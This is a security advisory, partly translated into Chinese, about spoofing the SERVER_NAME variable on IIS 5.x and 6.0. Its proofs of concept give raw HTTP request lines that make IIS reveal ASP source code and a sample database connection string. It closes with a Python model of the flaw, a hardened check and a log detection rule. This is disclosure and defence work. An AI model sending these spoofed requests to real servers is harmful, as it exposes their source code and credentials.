Remote IIS 5.x and IIS 6.0 Server Name Spoof


http://book.51cto.com/art/201110/295931.htm 

Author: Inge Henriksen
Organization: [Bug.Center.Team - Vulnerability Early Warning Center Team]
Translation: 剑心[BCT]
Note: this is not a complete translation (only the important parts were translated); please refer to the original.
IIS 5.0, 5.1 and 6.0 allow the "SERVER_NAME" server variable to be spoofed remotely by submitting a modified HTTP request. This can potentially expose sensitive ASP code through the IIS 500-100.asp error page, and the spoof may also be exploitable against a range of vulnerable third-party web applications and web services.

Technical Description
Microsoft's IIS family discloses sensitive information when the "SERVER_NAME" server variable is "localhost". When the "SERVER_NAME" server variable is "localhost" and an ASP page raises an error at run time, the code on the faulting line is shown in the browser. If you can spoof the "SERVER_NAME" IIS variable, you can make IIS show whatever you want. Other third-party web applications or web services that trust this server variable are affected by the flaw in the same way.

The spoofable "SERVER_NAME" server variable can be read through request.servervariables("SERVER_NAME") in ASP or HttpContext.Current.Request.ServerVariables("SERVER_NAME") in .NET; other programming languages have corresponding ways to read it, and all of them are equally exposed to the spoof.

If the HTTP request comes from a remote client, the server's "SERVER_NAME" variable returns the web server's own IP address. If the HTTP request comes from the same IP as the web server, request.servervariables("SERVER_NAME") returns "localhost". This can be used to fool web applications and web services into believing that the web server is being browsed from the server itself, in which case they may be tricked into showing an administrative interface to the visitor. One example that exploits this is the IIS 5.x 500-100.asp page, which uses this server variable to decide whether to display the code where the error occurred.

The official description of the server variable is "the server's host name, DNS alias, or IP address as it would appear in self-referencing URLs". Code therefore often references this variable to check whether an IP address is the server's own, which leads to a range of abuses such as cookie theft, data redirection and other URL-handling issues.

Many other applications use this variable, and MSDN offers developers many sample applications that can be attacked through this flaw. The most serious are the Microsoft .NET Passport SDK examples; any web application or web service built on them is vulnerable because of this defect.
Vendor Status: Notified 28. January 2005



Original:
It is possible to remotely spoof the "SERVER_NAME" Microsoft® Internet Information Server® 5.0, 5.1 and 6.0 server variable by making a modified HTTP request, thus potentially revealing sensitive ASP code through the IIS 500-100.asp error page; the spoof also opens up a potential range of exploits in third party web applications and web services.

Technical Description
Microsoft® IIS 5.x shows sensitive information if the "SERVER_NAME" IIS 5.x server variable is "localhost". If an IIS 5.x ASP page has an error, the code on the faulting line in the ASP page is shown in the browser, but only if the "SERVER_NAME" IIS server variable is "localhost". One can spoof the "SERVER_NAME" IIS server variable so that it shows whatever one wants. Other third party web applications or web services may also be vulnerable if authentication depends on the validity of this server variable. IIS 6.0 is vulnerable to the spoof, but its 500-100.asp page is not vulnerable.

The IIS server variable that can be spoofed is "SERVER_NAME". It can be accessed through request.servervariables("SERVER_NAME") with ASP, and HttpContext.Current.Request.ServerVariables("SERVER_NAME") with .NET; other programming languages have other methods to access this server variable, but are equally vulnerable.

If the HTTP request comes from a remote client, then the server variable "SERVER_NAME" returns the IP address of the web server itself. If the HTTP request came from the same IP as the web server (thus the request came from an authenticated user browsing from the web server itself), then request.servervariables("SERVER_NAME") returns "localhost". This fact is used as "proof" in web applications or web services that the person browsing the web server is in fact browsing from the web server itself. The web applications or web services may use this proof to display an administrative interface to the web browser user if such is the case. One exploitable example is the IIS 5.x 500-100.asp page (Note: the IIS 6.0 500-100.asp page is not vulnerable); the page uses the server variable to determine whether to display the code where the error occurred.

The technical description of the server variable is "The server's host name, DNS alias, or IP address as it would appear in self-referencing URLs". It is therefore often used in one's code to determine the IP address of the web server itself, which opens up a range of exploits including cookie stealing, data redirection, and other URL manipulation issues.

There are many other applications that rely on the validity of this server variable, and MSDN holds many examples for developers that are easily exploitable with this bug; among the most serious are the Microsoft® .NET Passport SDK examples. Any web application or web service based on these examples is probably vulnerable due to the bug.

Vendor Status: Notified 28. January 2005, but still no fix available.

Confirmed applications: Microsoft® Internet Information Server® 5.0, Microsoft® Internet Information Server® 5.1 and Microsoft® Internet Information Server® 6.0.

Confirmed platforms: Microsoft® Windows® 2000 with SP4, Microsoft® Windows® XP Professional with SP2, Microsoft® Windows® 2003 with SP1.

Proof of concept #1
Ok, you will need some sort of telnet client for this:

1. Create an ASP page called test.asp in the IIS web root and add the following code:
<% response.write request.servervariables("SERVER_NAME") %>

2. Try and access it from a remote server with telnet. Use the following HTTP request (Note: always send a double ENTER after an HTTP request to indicate the end of the request message):
GET /test.asp HTTP/1.0

3. The reply is the IP address of the web server, as one would expect.
4. Try and access it from the web server itself. Use the following HTTP request:
GET /test.asp HTTP/1.0

5. The reply is "localhost", as one would expect.
6. Try and access it from a remote server with telnet again. This time use the following HTTP request:
GET http://localhost/test.asp HTTP/1.0

7. It replies "localhost"; you have just fooled IIS into thinking that the HTTP request came from a user browsing from the web server itself.


Proof of concept #2
This PoC will show you how to get IIS 5.x to reveal code in a page that is not functioning correctly, by tricking IIS's 500-100.asp into thinking that the HTTP request came from the web server itself. The IIS page 500-100.asp reveals the ASP code when an error occurs. The relevant snippet of 500-100.asp looks like this (take especial note of the strServername = "localhost" test in the If condition):

--- Snip from the IIS file <webroot>/IISHelp/common/500-100.asp ---
strServername = LCase(Request.ServerVariables("SERVER_NAME"))
strServerIP = Request.ServerVariables("LOCAL_ADDR")
strRemoteIP = Request.ServerVariables("REMOTE_ADDR")
If (strServername = "localhost" Or strServerIP = strRemoteIP) And objASPError.File <> "?" Then
    Response.Write Server.HTMLEncode(objASPError.File)
    If objASPError.Line > 0 Then Response.Write ", line " & objASPError.Line
    If objASPError.Column > 0 Then Response.Write ", column " & objASPError.Column
    Response.Write "<br>"
    Response.Write "<font style=""COLOR:000000; FONT: 8pt/11pt courier new""><b>"
    Response.Write Server.HTMLEncode(objASPError.Source) & "<br>"
    If objASPError.Column > 0 Then Response.Write String((objASPError.Column - 1), "-") & "^<br>"
    Response.Write "</b></font>"
    blnErrorWritten = True
End If
...

Here you see that Microsoft® assumes that if Request.ServerVariables("SERVER_NAME") equals "localhost", then the code where the bug happened is returned to the client making the HTTP request.
A normal HTTP request might look like this:
GET /test.asp HTTP/1.0

But by adding "http://localhost/" you will see that the contents of Request.ServerVariables("SERVER_NAME") change to "localhost". Like this:
GET http://localhost/test.asp HTTP/1.0

Not only localhost works; one can fake it to anything:
GET http://www.someserver.xom/test.asp HTTP/1.0
GET http://198.2.168.1/test.asp HTTP/1.0

Now, armed with this knowledge, let us get down and dirty to reveal some code remotely:

1. Create a global.asa file in the root of your IIS web root with the following contents:
<script LANGUAGE=VBScript RUNAT=Server>
sub Application_OnStart()
Application("SQLConn") = Provider='sqloledb';Data Source=192.168.2.1;Initial Catalog=Test;User Id=someuser;Password=somepassword;"
end sub
</script>

2. Try and access the web root from a remote server with telnet. Use the following HTTP request:
GET / HTTP/1.0

3. The reply does not reveal the code on the "Application("SQLConn")..." line, as expected, since IIS 5.x recognizes you as being on a remote client. It does however tell you that there is an error on the page.

4. Now try the following HTTP request instead:
GET http://localhost/ HTTP/1.0

5. The reply displays the code, since the IIS server thinks you are browsing from the web server itself:

Microsoft VBScript compilation (0x800A03EA) Syntax error 127.0.0.1//global.asa, line 3, column 34
Application("SQLConn") = Provider='sqloledb';Data Source=192.168.2.1;Initial Catalog=Test;User Id=someuser;Password=somepassword;"
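As an added example (not part of the advisory), the following Python models the decision logic described above: how the request target determines SERVER_NAME, the 500-100.asp check beside a version that trusts only the socket addresses, and a log-side detection for absolute-form request lines. The server address, hostnames and request lines are constructed.

```python
# Constructed model of the SERVER_NAME trust bug; it reproduces the decision
# logic so the vulnerable check, the hardened check and a detection can be compared.
from urllib.parse import urlsplit

SERVER_ADDR = "192.168.2.10"                      # constructed: the server's own address
SERVER_NAMES = {SERVER_ADDR, "www.example.test"}  # constructed: names it legitimately serves


def server_name_from_request_line(request_line, server_addr=SERVER_ADDR):
    """Approximate how IIS 5.x filled SERVER_NAME: an origin-form target
    ("GET /x HTTP/1.0") gives the server's own address, an absolute-form
    target ("GET http://host/x HTTP/1.0") gives whatever host the client wrote."""
    _method, target, _version = request_line.split(" ", 2)
    if target.lower().startswith(("http://", "https://")):
        return urlsplit(target).hostname or server_addr
    return server_addr


def vulnerable_is_local(server_name, local_addr, remote_addr):
    """The 500-100.asp condition: because of the Or, a client-chosen
    SERVER_NAME of 'localhost' satisfies it without any address match."""
    return server_name.lower() == "localhost" or local_addr == remote_addr


def hardened_is_local(local_addr, remote_addr):
    """Decide only on the socket addresses, which the client cannot put in
    the request; SERVER_NAME takes no part in the trust decision."""
    return local_addr == remote_addr


def flag_spoof_attempts(request_lines, known_names=SERVER_NAMES):
    """Detection over request lines: an absolute-form target naming a host the
    server does not answer to is an attempt to pick SERVER_NAME from outside."""
    return [line for line in request_lines
            if server_name_from_request_line(line) not in known_names]


# Constructed request lines mirroring the advisory's proof of concept.
SAMPLE_REQUESTS = [
    "GET /test.asp HTTP/1.0",
    "GET http://www.example.test/test.asp HTTP/1.0",
    "GET http://localhost/test.asp HTTP/1.0",
    "GET http://198.2.168.1/test.asp HTTP/1.0",
]
```

Running flag_spoof_attempts over the sample list returns only the two lines whose absolute-form host is not one of the server's own names.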
